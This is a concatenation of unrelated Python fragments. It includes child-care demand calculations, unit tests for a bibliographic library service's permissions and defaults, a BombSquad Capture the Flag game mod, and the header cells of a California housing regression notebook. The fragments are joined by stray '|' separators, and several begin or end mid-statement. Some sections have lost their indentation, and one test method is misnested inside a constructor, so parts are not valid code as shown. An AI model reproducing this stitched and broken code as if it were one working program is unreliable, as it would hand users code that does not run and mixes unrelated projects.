shareUnmetChildCareDemand_5 = unmetChildCareNeed_5/totalChildCareNeed_5
# Graph 17
perCapitaUnmetCareDemand_1 = 0
if numClass_1 > 0:
perCapitaUnmetCareDemand_1 = unmetCareNeed_1/numClass_1
perCapitaUnmetCareDemand_2 = 0
if numClass_2 > 0:
perCapitaUnmetCareDemand_2 = unmetCareNeed_2/numClass_2
perCapitaUnmetCareDemand_3 = 0
if numClass_3 > 0:
perCapitaUnmetCareDemand_3 = unmetCareNeed_3/numClass_3
perCapitaUnmetCareDemand_4 = 0
if numClass_4 > 0:
perCapitaUnmetCareDemand_4 = unmetCareNeed_4/numClass_4
perCapitaUnmetCareDemand_5 = 0
if numClass_5 > 0:
perCapitaUnmetCareDemand_5 = unmetCareNeed_5/numClass_5
# Graph 18
numReceivers | |
make a library we need an actual user
user = User(absolute_uid=self.stub_user.absolute_uid)
with self.app.session_scope() as session:
session.add(user)
session.commit()
session.refresh(user)
session.expunge(user)
# Make a library that ensures we get one back
stub_library = LibraryShop()
library_dict = self.user_view.create_library(
service_uid=user.id,
library_data=stub_library.user_view_post_data
)
with self.app.session_scope() as session:
library_1 = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library_dict['id'])).one()
session.expunge(library_1)
self.document_view.update_library(
library_id=BaseView.helper_slug_to_uuid(library_dict['id']),
library_data=dict(public=True)
)
with self.app.session_scope() as session:
library_2 = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library_dict['id'])).one()
self.assertEqual(library_1.date_created, library_2.date_created)
self.assertNotEqual(library_1.date_created,
library_2.date_last_modified)
def test_returned_permissions_are_right(self):
    """
    Test that the correct permissions get returned for a library
    :return: no return
    """
    # Stub data
    stub_user_other = UserShop()
    # To make a library we need an actual user
    user = User(absolute_uid=self.stub_user.absolute_uid)
    user_other = User(absolute_uid=stub_user_other.absolute_uid)
    with self.app.session_scope() as session:
        session.add_all([user, user_other])
        session.commit()
        # Refresh/expunge so the ORM objects stay usable after the session closes.
        session.refresh(user)
        session.expunge(user)
        session.refresh(user_other)
        session.expunge(user_other)
    # Make a library to make sure things work properly
    stub_library = LibraryShop()
    library = self.user_view.create_library(
        service_uid=user.id,
        library_data=stub_library.user_view_post_data
    )
    # Grant the second user successively higher permissions on the library.
    stub_permissions = [{'read': True}, {'write': True}, {'admin': True}]
    for permission in stub_permissions:
        self.permission_view.add_permission(library_id=BaseView.helper_slug_to_uuid(library['id']),
                                            service_uid=user_other.id,
                                            permission=permission)
    # Get the library created
    with MockEmailService(stub_user_other, end_type='uid'):
        with MockEmailService(self.stub_user, end_type='uid'):
            libraries = self.user_view.get_libraries(
                service_uid=user_other.id,
                absolute_uid=user_other.absolute_uid
            )
    # NOTE(review): 'permission' is the leftover loop variable, i.e.
    # {'admin': True} — only the final (highest) grant is checked here.
    # Confirm this is intentional.
    self.assertEqual(list(permission.keys())[0], libraries[0]['permission'])
def test_can_only_see_number_of_people_with_admin_or_owner(self):
    """
    Test that the owner and admin can see the number of people
    :return: no return
    """
    # To make a library we need an actual user
    user_owner = User(absolute_uid=self.stub_user_1.absolute_uid)
    user_admin = User(absolute_uid=self.stub_user_2.absolute_uid)
    library = Library()
    permission_admin = Permissions(permissions={'read': False, 'write': False, 'admin': True, 'owner': False})
    permission_owner = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
    # Link each permission to both the library and the corresponding user.
    library.permissions.append(permission_admin)
    library.permissions.append(permission_owner)
    user_admin.permissions.append(permission_admin)
    user_owner.permissions.append(permission_owner)
    with self.app.session_scope() as session:
        session.add_all([user_owner, user_admin, library, permission_admin,
                         permission_owner])
        session.commit()
        # Refresh/expunge so the objects remain usable outside the session.
        for obj in [user_owner, user_admin, library, permission_admin,
                    permission_owner]:
            session.refresh(obj)
            session.expunge(obj)
    # Get the library created
    # For user admin
    with MockEmailService(self.stub_user_2, end_type='uid'):
        with MockEmailService(self.stub_user_1, end_type='uid'):
            libraries = self.user_view.get_libraries(
                service_uid=user_admin.id,
                absolute_uid=user_admin.absolute_uid
            )[0]
    # Admins can see how many users have access.
    self.assertTrue(libraries['num_users'] > 0)
    # For user owner
    with MockEmailService(self.stub_user_1, end_type='uid'):
        libraries = self.user_view.get_libraries(
            service_uid=user_owner.id,
            absolute_uid=user_owner.absolute_uid
        )[0]
    # Owners can see the user count as well.
    self.assertTrue(libraries['num_users'] > 0)
def test_cannot_see_number_of_people_with_lower_than_admin(self):
    """
    Test that the non-owner and non-admin cannot see the number of people
    :return: no return
    """
    # To make a library we need an actual user
    user_read = User(absolute_uid=self.stub_user_1.absolute_uid)
    user_write = User(absolute_uid=self.stub_user_2.absolute_uid)
    user_owner = User(absolute_uid=self.stub_user_3.absolute_uid)
    library = Library()
    permission_read = Permissions(permissions={'read': True, 'write': False, 'admin': False, 'owner': False})
    permission_write = Permissions(permissions={'read': False, 'write': True, 'admin': False, 'owner': False})
    permission_owner = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
    # Link each permission to both the library and the corresponding user.
    library.permissions.append(permission_read)
    library.permissions.append(permission_write)
    library.permissions.append(permission_owner)
    user_read.permissions.append(permission_read)
    user_write.permissions.append(permission_write)
    user_owner.permissions.append(permission_owner)
    with self.app.session_scope() as session:
        session.add_all([user_read, user_write, user_owner, library, permission_read,
                         permission_write, permission_owner])
        session.commit()
        # Refresh/expunge so the objects remain usable outside the session.
        for obj in [user_read, user_write, user_owner, library, permission_read,
                    permission_write, permission_owner]:
            session.refresh(obj)
            session.expunge(obj)
    # Get the library created
    # For user read
    with MockEmailService(self.stub_user_3, end_type='uid'):
        libraries = self.user_view.get_libraries(
            service_uid=user_read.id,
            absolute_uid=user_read.absolute_uid
        )[0]
    # Read-only collaborators see a zero user count.
    self.assertTrue(libraries['num_users'] == 0)
    # make sure the owner is correct
    self.assertIn(libraries['owner'], self.stub_user_3.email)
    # For user write
    with MockEmailService(self.stub_user_3, end_type='uid'):
        libraries = self.user_view.get_libraries(
            service_uid=user_write.id,
            absolute_uid=user_write.absolute_uid
        )[0]
    # Write collaborators likewise cannot see the user count.
    self.assertTrue(libraries['num_users'] == 0)
    self.assertIn(libraries['owner'], self.stub_user_3.email)
def test_user_cannot_add_two_libraries_with_the_same_name(self):
    """
    Test that a user cannot add a new library with the same name
    :return: no return
    """
    # To make a library we need an actual user
    user = User(absolute_uid=self.stub_user.absolute_uid)
    with self.app.session_scope() as session:
        session.add(user)
        session.commit()
        session.refresh(user)
        session.expunge(user)
    # Make the first library
    self.user_view.create_library(
        service_uid=user.id,
        library_data=self.stub_library.user_view_post_data
    )
    # Make the second library
    # A duplicate name for the same user violates the uniqueness constraint.
    with self.assertRaises(BackendIntegrityError):
        self.user_view.create_library(
            service_uid=user.id,
            library_data=self.stub_library.user_view_post_data
        )
def test_default_name_and_description_given_when_empty_string_passed(self):
    """
    Test that a user who provides empty strings for the name and
    description has them generated automatically.
    :return: no return
    """
    # Stub data
    stub_library = LibraryShop()
    # To make a library we need an actual user
    user = User(absolute_uid=self.stub_user.absolute_uid)
    with self.app.session_scope() as session:
        session.add(user)
        session.commit()
        session.refresh(user)
        session.expunge(user)
        # Make the first library
        for i in range(2):
            # On each loop the user view post will be modified, so lets just
            # be explicit about what we want
            stub_library.user_view_post_data['name'] = ''
            stub_library.user_view_post_data['description'] = ''
            library = self.user_view.create_library(
                service_uid=user.id,
                library_data=stub_library.user_view_post_data
            )
            # Defaults are numbered sequentially: 'Untitled Library 1', '2', ...
            lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one()
            self.assertTrue(lib.name == 'Untitled Library {0}'.format(i+1))
            self.assertTrue(lib.description == DEFAULT_LIBRARY_DESCRIPTION)
def test_default_name_and_description_given_when_no_content(self):
    """
    Test that a user who does not specify a title or description has them
    generated automatically.
    :return: no return
    """
    # Stub data
    stub_library = LibraryShop(name=None, description=None)
    del stub_library.name
    del stub_library.description
    # Sanity check that the attributes are really gone.
    # NOTE(review): if the first lookup raises, the second line never runs,
    # so only 'name' is actually verified inside this block.
    with self.assertRaises(AttributeError):
        stub_library.name
        stub_library.description
    stub_library.user_view_post_data.pop('name')
    stub_library.user_view_post_data.pop('description')
    # Same caveat: only the 'name' key lookup is guaranteed to be checked.
    with self.assertRaises(KeyError):
        stub_library.user_view_post_data['name']
        stub_library.user_view_post_data['description']
    # To make a library we need an actual user
    user = User(absolute_uid=self.stub_user.absolute_uid)
    with self.app.session_scope() as session:
        session.add(user)
        session.commit()
        session.refresh(user)
        session.expunge(user)
    # Make the first library
    for i in range(2):
        library = self.user_view.create_library(
            service_uid=user.id,
            library_data=stub_library.user_view_post_data
        )
        with self.app.session_scope() as session:
            # Defaults are numbered sequentially: 'Untitled Library 1', '2', ...
            lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one()
            self.assertTrue(lib.name == 'Untitled Library {0}'.format(i+1))
            self.assertTrue(lib.description == DEFAULT_LIBRARY_DESCRIPTION)
def test_long_description_is_truncated(self):
    """
    Test that a user who provides a very long library description has that description
    truncated appropriately.
    :return: no return
    """
    # stub data: description longer than the 200-character cap asserted below
    stub_library = LibraryShop(name="Test Library", description="x"*400)
    # make a user
    user = User(absolute_uid=self.stub_user.absolute_uid)
    with self.app.session_scope() as session:
        session.add(user)
        session.commit()
        session.refresh(user)
        session.expunge(user)
    # make the library
    library = self.user_view.create_library(service_uid=user.id, library_data=stub_library.user_view_post_data)
    # check description length
    with self.app.session_scope() as session:
        lib = session.query(Library).filter(Library.id == BaseView.helper_slug_to_uuid(library['id'])).one()
        self.assertTrue(lib.name == "Test Library")
        self.assertTrue(len(lib.description) <= 200)
class TestLibraryViews(TestCaseDatabase):
"""
Base class to test the Library view for GET
"""
def __init__(self, *args, **kwargs):
    """
    Constructor of the class
    :param args: to pass on to the super class
    :param kwargs: to pass on to the super class
    :return: no return
    """
    super(TestLibraryViews, self).__init__(*args, **kwargs)
    # Views under test and shared stub users/library for the test methods.
    self.user_view = UserView
    self.library_view = LibraryView
    # stub_user and stub_user_1 deliberately alias the same UserShop instance.
    self.stub_user = self.stub_user_1 = UserShop()
    self.stub_user_2 = UserShop()
    self.stub_library = LibraryShop()
    def test_user_can_get_documents_from_library(self):
        """
        Test that can retrieve all the bibcodes from a library
        :return: no return
        """
        # Ensure a user exists
        user = User(absolute_uid=self.stub_user.absolute_uid)
        with self.app.session_scope() as session:
            session.add(user)
            session.commit()
            # Ensure a library exists
            library = Library(name='MyLibrary',
                              description='My library',
                              public=True,
                              bibcode=self.stub_library.bibcode)
            # Give the user and library permissions
            permission = Permissions(permissions={'read': True, 'write': True, 'admin': False, 'owner': True})
            # Commit the stub data
            user.permissions.append(permission)
            library.permissions.append(permission)
            session.add_all([library, permission, user])
            session.commit()
            # Refresh then detach the ORM objects so their attributes stay
            # readable after the session closes
            for obj in [library, permission, user]:
                session.refresh(obj)
                session.expunge(obj)
        # Retrieve the bibcodes using the web services
        # NOTE(review): MockEmailService stubs the external user-resolution
        # call; end_type='uid' presumably resolves by uid — confirm in shop helper
        with MockEmailService(self.stub_user, end_type='uid'):
            response_library, meta_data = \
                self.library_view.get_documents_from_library(
                    library_id=library.id,
                    service_uid=user.id
                )
        self.assertEqual(library.bibcode, response_library.bibcode)
    def test_user_retrieves_correct_library_content(self):
        """
        Test that the contents returned from the library_view contains all the
        information that we want
        :return: no return
        """
        # Stub data
        user = User(absolute_uid=self.stub_user.absolute_uid)
        with self.app.session_scope() as session:
            session.add(user)
            session.commit()
            # Ensure a library exists
            library = Library(name='MyLibrary',
                              description='My library',
                              public=True,
                              bibcode=self.stub_library.bibcode)
            # Give the user and library permissions (owner only, no read/write)
            permission = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
            # Commit the stub data
            user.permissions.append(permission)
            library.permissions.append(permission)
            session.add_all([library, permission, user])
            session.commit()
            # Detach objects so they remain usable outside the session
            for obj in [library, permission, user]:
                session.refresh(obj)
                session.expunge(obj)
        with MockEmailService(self.stub_user, end_type='uid'):
            library, metadata = self.library_view.get_documents_from_library(
                library_id=library.id,
                service_uid=user.id
            )
        # Every key the view promises must be present in the metadata
        for key in self.stub_library.library_view_get_response():
            self.assertIn(key, metadata)
    def test_user_retrieves_correct_library_content_if_not_owner(self):
        """
        Test that the contents returned from the library_view contains all the
        information that we want
        :return: no return
        """
        # Stub data: one owner and one unrelated (non-owner) user
        user = User(absolute_uid=self.stub_user.absolute_uid)
        user_random = User(absolute_uid=self.stub_user_2.absolute_uid)
        with self.app.session_scope() as session:
            session.add(user)
            session.commit()
            # Ensure a library exists (private, owned by `user`)
            library = Library(name='MyLibrary',
                              description='My library',
                              public=False,
                              bibcode=self.stub_library.bibcode)
            # Give the user and library permissions
            permission = Permissions(permissions={'read': False, 'write': False, 'admin': False, 'owner': True})
            # Commit the stub data
            user.permissions.append(permission)
            library.permissions.append(permission)
            session.add_all([library, permission, user, user_random])
            session.commit()
            # Detach objects so they remain usable outside the session
            for obj in [library, permission, user, user_random]:
                session.refresh(obj)
                session.expunge(obj)
        # Request the library contents as the non-owner
        with MockEmailService(self.stub_user, end_type='uid'):
            library, metadata = self.library_view.get_documents_from_library(
                library_id=library.id,
                service_uid=user_random.id
            )
        for key in self.stub_library.library_view_get_response():
            self.assertIn(key, metadata)
        # a non-owner should not see how many users share the library
        self.assertEqual(0, metadata['num_users'])
    def test_that_solr_data_is_returned(self):
        """
        Test that can retrieve all the bibcodes from a library with the data
        returned from the solr bigquery end point
        :return: no return
        """
        # Ensure a user exists
        user = User(absolute_uid=self.stub_user.absolute_uid)
        with self.app.session_scope() as session:
            session.add(user)
            session.commit()
            # Ensure a library exists
            library = Library(name='MyLibrary',
                              description='My library',
                              public=True,
                              bibcode=self.stub_library.bibcode)
            # Give the user and library permissions
            permission = Permissions(permissions={'read': True, 'write': True, 'admin': False, 'owner': False})
            # Commit the stub data
            user.permissions.append(permission)
            library.permissions.append(permission)
            session.add_all([library, permission, user])
            session.commit()
            # Detach objects so they remain usable outside the session
            for obj in [library, permission, user]:
                session.refresh(obj)
                session.expunge(obj)
        # Retrieve the bibcodes using the web services
        with MockSolrBigqueryService():
            response_library = self.library_view.solr_big_query(
                bibcodes=library.bibcode
            )
        # the mocked solr response carries the standard solr response header
        self.assertIn('responseHeader', response_library.json())
def test_that_solr_updates_canonical_bibcodes(self):
"""
Tests that a comparison between the solr data and the stored data is
carried out. Mismatching documents are then updated appropriately.
:return: no return
"""
# Ensure a | |
import bs
import random
def bsGetAPIVersion():
    """Return the BombSquad mod-API version this module targets.

    See bombsquadgame.com/apichanges for the API change log.
    """
    return 4
def bsGetGames():
    """Expose the game activity classes provided by this module."""
    return [CTFGame]
class CTFFlag(bs.Flag):
    """A team's flag with an in-world countdown label attached to it."""

    def __init__(self, activity, team):
        bs.Flag.__init__(
            self,
            materials=[team.gameData['flagMaterial']],
            position=team.gameData['basePos'],
            color=team.color)
        self._team = team
        self._heldCount = 0
        # Small floating text node used to show return countdowns above
        # the flag; owned by the flag node so it dies with it.
        self._counter = bs.newNode(
            'text',
            owner=self.node,
            attrs={
                'inWorld': True,
                'scale': 0.02,
                'hAlign': 'center'
            })
        self.resetReturnTimes()

    def resetReturnTimes(self):
        """Reload both return timers from the activity settings."""
        settings = self.getActivity().settings
        self._timeOutRespawnTime = int(settings['Flag Idle Return Time'])
        self._touchReturnTime = float(settings['Flag Touch Return Time'])

    def getTeam(self):
        """Return the team this flag belongs to."""
        return self._team
class CTFGame(bs.TeamGameActivity):
@classmethod
def getName(cls):
return 'Capture the Flag'
@classmethod
def getDescription(cls, sessionType):
return 'Return the enemy flag to score.'
@classmethod
def supportsSessionType(cls, sessionType):
return True if issubclass(sessionType, bs.TeamsSession) else False
@classmethod
def getSupportedMaps(cls, sessionType):
return bs.getMapsSupportingPlayType("teamFlag")
    @classmethod
    def getSettings(cls, sessionType):
        """Configurable settings exposed in the game-setup UI."""
        return [
            ("Score to Win", {'minValue': 1, 'default': 3}),
            # seconds of team contact needed to return a flag; 0 = instant
            ("Flag Touch Return Time", {
                'minValue': 0, 'default': 0, 'increment': 1}),
            # seconds an unheld flag sits away from base before auto-return
            ("Flag Idle Return Time", {
                'minValue': 5, 'default': 30, 'increment': 5}),
            ("Time Limit", {
                'choices': [('None', 0), ('1 Minute', 60),
                            ('2 Minutes', 120), ('5 Minutes', 300),
                            ('10 Minutes', 600), ('20 Minutes', 1200)],
                'default': 0 }),
            ("Respawn Times", {
                'choices': [('Shorter', 0.25), ('Short', 0.5), ('Normal',1.0),
                            ('Long',2.0), ('Longer', 4.0)],
                'default': 1.0}),
            ("Epic Mode", {'default': False})] # yapf: disable
def __init__(self, settings):
bs.TeamGameActivity.__init__(self, settings)
self._scoreBoard = bs.ScoreBoard()
if self.settings['Epic Mode']: self._isSlowMotion = True
self._alarmSound = bs.getSound("alarm")
self._tickingSound = bs.getSound("ticking")
self._lastScoreTime = 0
self._scoreSound = bs.getSound("score")
self._swipSound = bs.getSound("swip")
self._allBasesMaterial = bs.Material()
def getInstanceDescription(self):
if self.settings['Score to Win'] == 1: return 'Steal the enemy flag.'
else:
return ('Steal the enemy flag ${ARG1} times.',
self.settings['Score to Win'])
def getInstanceScoreBoardDescription(self):
if self.settings['Score to Win'] == 1: return 'return 1 flag'
else: return ('return ${ARG1} flags', self.settings['Score to Win'])
def onTransitionIn(self):
bs.TeamGameActivity.onTransitionIn(
self,
music='Epic' if self.settings['Epic Mode'] else 'FlagCatcher')
    def onTeamJoin(self, team):
        """Set up per-team state: base marker, trigger region, collision
        materials and the team's first flag."""
        # per-team score and flag bookkeeping
        team.gameData['score'] = 0
        team.gameData['flagReturnTouches'] = 0
        team.gameData['homeFlagAtBase'] = True
        team.gameData['touchReturnTimer'] = None
        team.gameData['enemyFlagAtBase'] = False
        team.gameData['basePos'] = self.getMap().getFlagPosition(team.getID())
        self.projectFlagStand(team.gameData['basePos'])
        # team-colored light marking the base
        bs.newNode(
            'light',
            attrs={
                'position': team.gameData['basePos'],
                'intensity': 0.6,
                'heightAttenuated': False,
                'volumeIntensityScale': 0.1,
                'radius': 0.1,
                'color': team.color
            })
        baseRegionMat = team.gameData['baseRegionMaterial'] = bs.Material()
        p = team.gameData['basePos']
        # spherical trigger region hovering just above the base
        team.gameData['baseRegion'] = bs.newNode(
            "region",
            attrs={
                'position': (p[0], p[1] + 0.75, p[2]),
                'scale': (0.5, 0.5, 0.5),
                'type': 'sphere',
                'materials': [baseRegionMat, self._allBasesMaterial]
            })
        # create some materials for this team
        spazMatNoFlagPhysical = team.gameData[
            'spazMaterialNoFlagPhysical'] = bs.Material()
        spazMatNoFlagCollide = team.gameData[
            'spazMaterialNoFlagCollide'] = bs.Material()
        flagMat = team.gameData['flagMaterial'] = bs.Material()
        # some parts of our spazzes don't collide physically with our
        # flags but generate callbacks
        spazMatNoFlagPhysical.addActions(
            conditions=('theyHaveMaterial', flagMat),
            actions=(('modifyPartCollision', 'physical',
                      False), ('call', 'atConnect',
                               lambda: self._handleHitOwnFlag(team, 1)),
                     ('call', 'atDisconnect',
                      lambda: self._handleHitOwnFlag(team, 0))))
        # other parts of our spazzes don't collide with our flags at all
        spazMatNoFlagCollide.addActions(
            conditions=('theyHaveMaterial', flagMat),
            actions=('modifyPartCollision', 'collide', False))
        # we wanna know when *any* flag enters/leaves our base
        baseRegionMat.addActions(
            conditions=('theyHaveMaterial', bs.Flag.getFactory().flagMaterial),
            actions=(('modifyPartCollision', 'collide',
                      True), ('modifyPartCollision', 'physical', False),
                     ('call', 'atConnect',
                      lambda: self._handleFlagEnteredBase(team)),
                     ('call', 'atDisconnect',
                      lambda: self._handleFlagLeftBase(team))))
        self._spawnFlagForTeam(team)
        self._updateScoreBoard()
    def onBegin(self):
        """Start the match: time limit, powerups and the 1s update tick."""
        bs.TeamGameActivity.onBegin(self)
        self.setupStandardTimeLimit(self.settings['Time Limit'])
        self.setupStandardPowerupDrops()
        # drive flag idle-return countdowns once a second
        bs.gameTimer(1000, call=self._tick, repeat=True)
    def _spawnFlagForTeam(self, team):
        """Create a fresh flag at *team*'s base, flash the base and play a
        spawn sound."""
        flag = team.gameData['flag'] = CTFFlag(self, team)
        team.gameData['flagReturnTouches'] = 0
        self._flashBase(team, length=1000)
        bs.playSound(self._swipSound, position=flag.node.position)
    def _handleFlagEnteredBase(self, team):
        """Collision callback: some flag just entered *team*'s base region.

        If it is the team's own flag, note that it is home (and score if the
        enemy flag is already here). If it is an enemy flag, either score or
        warn that the home flag is missing.
        """
        flag = bs.getCollisionInfo("opposingNode").getDelegate()
        if flag.getTeam() is team:
            team.gameData['homeFlagAtBase'] = True
            # if the enemy flag is already here, score!
            if team.gameData['enemyFlagAtBase']:
                self._score(team)
        else:
            team.gameData['enemyFlagAtBase'] = True
            if team.gameData['homeFlagAtBase']:
                # award points to whoever was carrying the enemy flag
                try:
                    player = flag._lastPlayerToHold
                except Exception:
                    player = None
                if player is not None and player.exists(
                ) and player.getTeam() is team:
                    self.scoreSet.playerScored(player, 50, bigMessage=True)
                # update score and reset flags
                self._score(team)
            # if the home-team flag isn't here, print a message to that effect
            else:
                if not hasattr(self, '_lastHomeFlagNoticePrintTime'):
                    self._lastHomeFlagNoticePrintTime = 0
                t = bs.getRealTime()
                # throttle the on-screen warning to once per 5 seconds
                if t - self._lastHomeFlagNoticePrintTime > 5000:
                    self._lastHomeFlagNoticePrintTime = t
                    p = team.gameData['basePos']
                    tNode = bs.newNode(
                        'text',
                        attrs={
                            'text':
                                bs.Lstr(resource='ownFlagAtYourBaseWarning'),
                            'inWorld':
                                True,
                            'scale':
                                0.013,
                            'color': (1, 1, 0, 1),
                            'hAlign':
                                'center',
                            'position': (p[0], p[1] + 3.2, p[2])
                        })
                    bs.gameTimer(5100, tNode.delete)
                    bs.animate(tNode, 'scale', {
                        0: 0,
                        200: 0.013,
                        4800: 0.013,
                        5000: 0
                    })
    def _tick(self):
        """Once-per-second update driving the flags' idle-return timers."""
        # if either flag is away from base and not being held, tick down its
        # respawn timer
        for team in self.teams:
            flag = team.gameData['flag']
            if not team.gameData['homeFlagAtBase'] and flag._heldCount == 0:
                timeOutCountingDown = True
                flag._timeOutRespawnTime -= 1
                if flag._timeOutRespawnTime <= 0:
                    # killing the flag respawns it at its base
                    flag.handleMessage(bs.DieMessage())
            else:
                timeOutCountingDown = False
            if flag.node.exists() and flag._counter.exists():
                # keep the counter text hovering above the flag
                t = flag.node.position
                flag._counter.position = (t[0], t[1] + 1.3, t[2])
                # if there's no self-touches on this flag, set its text
                # to show its auto-return counter. (if there's self-touches
                # its showing that time)
                if team.gameData['flagReturnTouches'] == 0:
                    flag._counter.text = str(flag._timeOutRespawnTime) if (
                        timeOutCountingDown
                        and flag._timeOutRespawnTime <= 10) else ''
                    flag._counter.color = (1, 1, 1, 0.5)
                    flag._counter.scale = 0.014
    def _score(self, team):
        """Credit *team* with a capture, reset all flags and maybe end the
        game."""
        team.gameData['score'] += 1
        bs.playSound(self._scoreSound)
        self._flashBase(team)
        self._updateScoreBoard()
        # have teammates celebrate
        for player in team.players:
            try:
                player.actor.node.handleMessage('celebrate', 2000)
            except Exception:
                # player may have no live actor/node; celebration is cosmetic
                pass
        # reset all flags/state
        for resetTeam in self.teams:
            if not resetTeam.gameData['homeFlagAtBase']:
                resetTeam.gameData['flag'].handleMessage(bs.DieMessage())
            resetTeam.gameData['enemyFlagAtBase'] = False
        if team.gameData['score'] >= self.settings['Score to Win']:
            self.endGame()
def endGame(self):
results = bs.TeamGameResults()
for t in self.teams:
results.setTeamScore(t, t.gameData['score'])
self.end(results=results, announceDelay=800)
    def _handleFlagLeftBase(self, team):
        """Collision callback: some flag just left *team*'s base region."""
        curTime = bs.getGameTime()
        opNode = bs.getCollisionInfo("opposingNode")
        try:
            flag = opNode.getDelegate()
        except Exception:
            return  # can happen when we kill a flag
        if flag.getTeam() is team:
            # check times here to prevent too much flashing
            if ('lastFlagLeaveTime' not in team.gameData
                    or curTime - team.gameData['lastFlagLeaveTime'] > 3000):
                bs.playSound(
                    self._alarmSound, position=team.gameData['basePos'])
                self._flashBase(team)
            team.gameData['lastFlagLeaveTime'] = curTime
            team.gameData['homeFlagAtBase'] = False
        else:
            team.gameData['enemyFlagAtBase'] = False
    def _touchReturnUpdate(self, team):
        """100ms timer callback counting down the touch-return time while a
        teammate is touching their own (displaced) flag."""
        # count down only while its away from base and not being held
        if (team.gameData['homeFlagAtBase']
                or team.gameData['flag']._heldCount > 0):
            team.gameData['touchReturnTimerTicking'] = None
            return  # no need to return when its at home
        else:
            if team.gameData['touchReturnTimerTicking'] is None:
                # start a looping ticking sound for the countdown
                team.gameData['touchReturnTimerTicking'] = bs.NodeActor(
                    bs.newNode(
                        'sound',
                        attrs={
                            'sound': self._tickingSound,
                            'positional': False,
                            'loop': True
                        }))
            flag = team.gameData['flag']
            flag._touchReturnTime -= 0.1
            # show the remaining time above the flag
            if flag._counter.exists():
                flag._counter.text = "%.1f" % flag._touchReturnTime
                flag._counter.color = (1, 1, 0, 1)
                flag._counter.scale = 0.02
            if flag._touchReturnTime <= 0.0:
                self._awardPlayersTouchingOwnFlag(team)
                # killing the flag respawns it at its base
                flag.handleMessage(bs.DieMessage())
def _awardPlayersTouchingOwnFlag(self, team):
for player in team.players:
if player.gameData['touchingOwnFlag'] > 0:
returnScore = 10 + 5 * int(
self.settings['Flag Touch Return Time'])
self.scoreSet.playerScored(
player, returnScore, screenMessage=False)
    def _handleHitOwnFlag(self, team, val):
        """Collision callback: a *team* player touched their own flag.

        *val* is 1 when contact starts and 0 when it ends.
        """
        # keep track of when each player is touching their own flag so we can
        # award points when returned
        srcNode = bs.getCollisionInfo('sourceNode')
        try:
            player = srcNode.getDelegate().getPlayer()
        except Exception:
            player = None
        if player is not None and player.exists():
            if val: player.gameData['touchingOwnFlag'] += 1
            else: player.gameData['touchingOwnFlag'] -= 1
        # if return-time is zero, just kill it immediately.. otherwise keep
        # track of touches and count down
        if float(self.settings['Flag Touch Return Time']) <= 0.0:
            if (not team.gameData['homeFlagAtBase']
                    and team.gameData['flag']._heldCount == 0):
                # use a node message to kill the flag instead of just killing
                # our team's. (avoids redundantly killing new flags if
                # multiple body parts generate callbacks in one step)
                node = bs.getCollisionInfo("opposingNode")
                if node is not None and node.exists():
                    self._awardPlayersTouchingOwnFlag(team)
                    node.handleMessage(bs.DieMessage())
        # takes a non-zero amount of time to return
        else:
            if val:
                team.gameData['flagReturnTouches'] += 1
                # first toucher starts the 100ms countdown timer
                if team.gameData['flagReturnTouches'] == 1:
                    team.gameData['touchReturnTimer'] = bs.Timer(
                        100,
                        call=bs.Call(self._touchReturnUpdate, team),
                        repeat=True)
                    team.gameData['touchReturnTimerTicking'] = None
            else:
                team.gameData['flagReturnTouches'] -= 1
                # last toucher leaving stops the timer and the tick sound
                if team.gameData['flagReturnTouches'] == 0:
                    team.gameData['touchReturnTimer'] = None
                    team.gameData['touchReturnTimerTicking'] = None
            if team.gameData['flagReturnTouches'] < 0:
                bs.printError(
                    'CTF: flagReturnTouches < 0; this shouldn\'t happen.')
def _flashBase(self, team, length=2000):
light = bs.newNode(
'light',
attrs={
'position': team.gameData['basePos'],
'heightAttenuated': False,
'radius': 0.3,
'color': team.color
})
bs.animate(light, 'intensity', {0: 0, 250: 2.0, 500: 0}, loop=True)
bs.gameTimer(length, light.delete)
    def spawnPlayerSpaz(self, *args, **keywds):
        """Spawn a player character and attach this team's flag materials.

        Signature is passed straight through to
        bs.TeamGameActivity.spawnPlayerSpaz.
        """
        # intercept new spazzes and add our team material for them
        spaz = bs.TeamGameActivity.spawnPlayerSpaz(self, *args, **keywds)
        spaz.getPlayer().gameData['touchingOwnFlag'] = 0
        noPhysicalMats = [
            spaz.getPlayer().getTeam().gameData['spazMaterialNoFlagPhysical']
        ]
        noCollideMats = [
            spaz.getPlayer().getTeam().gameData['spazMaterialNoFlagCollide']
        ]
        # our normal parts should still collide; just not physically
        # (so we can calc restores)
        spaz.node.materials = list(spaz.node.materials) + noPhysicalMats
        spaz.node.rollerMaterials = list(
            spaz.node.rollerMaterials) + noPhysicalMats
        # pickups and punches shouldn't hit at all though
        spaz.node.punchMaterials = list(
            spaz.node.punchMaterials) + noCollideMats
        spaz.node.pickupMaterials = list(
            spaz.node.pickupMaterials) + noCollideMats
        spaz.node.extrasMaterials = list(
            spaz.node.extrasMaterials) + noCollideMats
        return spaz
def _updateScoreBoard(self):
for team in self.teams:
self._scoreBoard.setTeamValue(team, team.gameData['score'],
self.settings['Score to Win'])
def handleMessage(self, m):
if isinstance(m, bs.PlayerSpazDeathMessage):
bs.TeamGameActivity.handleMessage(self, m) # augment standard
self.respawnPlayer(m.spaz.getPlayer())
elif isinstance(m, bs.FlagDeathMessage):
try:
bs.gameTimer(100, bs.Call(self._spawnFlagForTeam, m.flag.getTeam()))
except: pass
elif | |
#!/usr/bin/env python
# coding: utf-8
# # Regression Project: The California Housing Prices Data Set
# ### Context
# This is the dataset used in the second chapter of Aurélien Géron's recent book *'Hands-On Machine Learning with Scikit-Learn and TensorFlow'. (O'Reilly)*
#
# It serves as an excellent introduction to implementing machine learning algorithms because it requires rudimentary data cleaning, has an easily understandable list of variables and sits at an optimal size between being too toyish and too cumbersome.
#
# The data contains information from the 1990 California census.
#
# ### Source
# This dataset is a modified version of the California Housing dataset available from Luís Torgo's page (University of Porto).
#
# This dataset appeared in a 1997 paper titled *Sparse Spatial Autoregressions* by R. Kelley Pace and Ronald Barry, published in the *Statistics and Probability Letters* journal. **It contains one row per census block group**. A block group is the smallest geographical unit for which the U.S. Census Bureau publishes sample data **(a block group typically has a population of 600 to 3,000 people)**.
#
